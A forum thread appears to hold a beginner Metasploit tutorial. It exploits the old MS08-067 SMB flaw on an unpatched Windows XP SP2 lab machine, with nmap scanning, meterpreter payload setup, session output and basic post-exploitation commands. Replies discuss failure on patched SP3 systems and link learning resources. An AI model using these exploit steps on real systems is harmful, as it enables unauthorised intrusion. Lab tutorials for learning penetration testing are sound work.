introduction to metasploit

[EcKo]

This tutorial will give a basic introduction to metasploit.
In the process, we'll also exploit a machine and run meterpreter on it.

Everything that needs to be typed in console makes use of the code tag
example:

Code:

msfconsole

Also, I assume you have some basic understanding of networking and linux.
WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.

now on to the actual guide.

requirements:
backtrack 4 final
non-patched windows xp sp2 box
(confirmed that this does not work on xp sp3)
some patience

These are my ip's, make sure to change it to reflect your own settings
attacker: 192.168.198.129
victim: 192.168.198.130

Ok, first things first, make sure that metasploit is updated.

Code:

/pentest/exploits/fasttrack/fast-track.py -i
1 
2

Do a nmap scan to make sure there are some open ports (with hopefully vulnerable services)

Code:

nmap -v 192.168.198.130

Nmap is done scanning and showed me 3 open ports. (if yours say filtered on all ports, try turning off any firewall)
These are port 135, 139, 445.
We're going to focus on port 445.
A quick search on google shows us that port 445 is commonly used for smb.

start up metasploit

Code:

msfconsole

when its done loading,

Code:

show exploits windows

We need an exploit for smb, so we need to choose one from smb folder. I used the ms08_067_netapi exploit.

Code:

use windows/smb/ms08_067_netapi

Notice that after we typed this, msf > changed to msf exploit(ms08_067_netapi)>

Great, so now we have an exploit, but what next?
an exploit is useless without a payload, so

Code:

show payloads

This will give us a list of payloads compatible with the exploit.
We're going to use a meterpreter payload for this tutorial

Code:

set payload windows/meterpreter/bind_tcp

now to configure it all

Code:

info
set target 3
set rhost 192.168.198.130

target is the which windows version and service pack our victim is (our case xp sp2)
though, you could also leave it how it is.
rhost is the ip of the victim
everything else can be default.
if the payload was a reverse tcp, we would also need to set lhost
lhost is the attackers ip.

Code:

exploit

this is what we (should) get:

[*] Started bind handler
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444

meterpreter >

great! we're in!
lets see what commands we got at our disposal

Code:

help

under what username is meterpreter running?

Code:

getuid

what processes are running?

Code:

ps

and so we can go on and on about what we can do with meterpreter, but that is outside of the scope of this tutorial.

hope this guide has been useful to someone, somewhere.

for a more indepth guide to what metasploit can do, check this link.
Metasploit Unleashed - Mastering the Framework

[Linus1907]

Nice one, _EcKo

Thank you.

If anyone might want to learn more about metasploit, read here : Metasploit Unleashed - Mastering the Framework

[mesmar]

very good
thnx for sharing

[Bashar]

Good post, thanks! I'll have to try this out when I get back.

[reahel]

First at all: thanx!

I have a little question... I used the option "set target 0" too, for an automatic test about so 'version' etc ... but this is the result:

Code:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.

The firewall is off and the antivirus too... i am using vbox.
Maybe the system is patched for this kind of exploits?

In this case, it is possible to do something more with this exploit or can i consider this like a closed way?

Thanx (and sorry for my strange english )

[hhmatt]

First at all: thanx!

I have a little question... I used the option "set target 0" too, for an automatic test about so 'version' etc ... but this is the result:

Code:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.

The firewall is off and the antivirus too... i am using vbox.
Maybe the system is patched for this kind of exploits?

In this case, it is possible to do something more with this exploit or can i consider this like a closed way?

Thanx (and sorry for my strange english )

Your system is probably already patched against the ms08-067 vulnerability. It was published in Oct. 2008, here's the link.

[Mr-Protocol]

Here is a lot of information on metasploit from the folks at Offensive Security Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

[reahel]

...nothing to do... for ' my ' version of xp.
But i am begin to understand how metasloit works... and i am happy for this.

Thanx! The link is great! And this community really active!

[hhmatt]

Here is a lot of information on metasploit from the folks at Offensive Security Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

Definately worthy of mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.

Good job aswell _EcKo Thanks.

[Dominate.R]

I wonder if this'll work with XP SP3.
I'll definitely try it tonight.
Cheers.